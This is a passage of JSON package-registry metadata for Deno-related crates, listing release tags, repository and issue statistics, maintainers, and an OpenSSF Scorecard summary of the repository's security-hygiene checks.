/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T20:50:24.895Z","dependent_packages_count":1,"downloads":61687,"downloads_period":"total","dependent_repos_count":2,"rankings":{"downloads":12.333507097905004,"dependent_repos_count":13.317204097833892,"dependent_packages_count":18.15597474766567,"stargazers_count":0.0022664944130912717,"forks_count":0.058173356602675974,"docker_downloads_count":null,"average":8.773425158884066},"purl":"pkg:cargo/deno-x86_64-unknown-linux-gnu","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno-x86_64-unknown-linux-gnu","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno-x86_64-unknown-linux-gnu","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno-x86_64-unknown-linux-gnu/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-unknown-linux-gnu/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-unknown-linux-gnu/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-unknown-linux-gnu/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-unknown-linux-gnu/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-unknown-linux-gnu/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno-x86_64-unknown-linux-gnu/codemeta","maintainers":[{"uuid":"28170","login":"ry","name":"Ryan Dahl","email":null,"url":"https://github.com/ry","packages_count":18,"html_url":"https://crates.io/users/ry","role":null,"created_at":"2022-11-07T18:29:41.646Z","updated_at":"2022-11-07T18:29:41.646Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/ry/packages"},{"uuid":"45082","login":"piscisaureus","name":"Bert Belder","email":null,"url":"https://github.com/piscisaureus","packages_count":12,"html_url":"https://crates.io/users/piscisaureus","role":null,"created_at":"2022-11-07T18:29:41.655Z","updated_at":"2022-11-07T18:29:41.655Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/piscisaureus/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":5195691,"name":"deno_flash","ecosystem":"cargo","description":"DEPRECATED: Fast HTTP/1 server implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":33,"first_release_published_at":"2022-08-25T00:56:50.727Z","latest_release_published_at":"2023-04-03T16:26:56.387Z","latest_release_number":"0.34.0","last_synced_at":"2026-09-07T22:53:46.522Z","created_at":"2022-08-25T01:06:01.832Z","updated_at":"2026-09-07T22:53:46.522Z","registry_url":"https://crates.io/crates/deno_flash/","install_command":"cargo install deno_flash","documentation_url":"https://docs.rs/deno_flash/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using 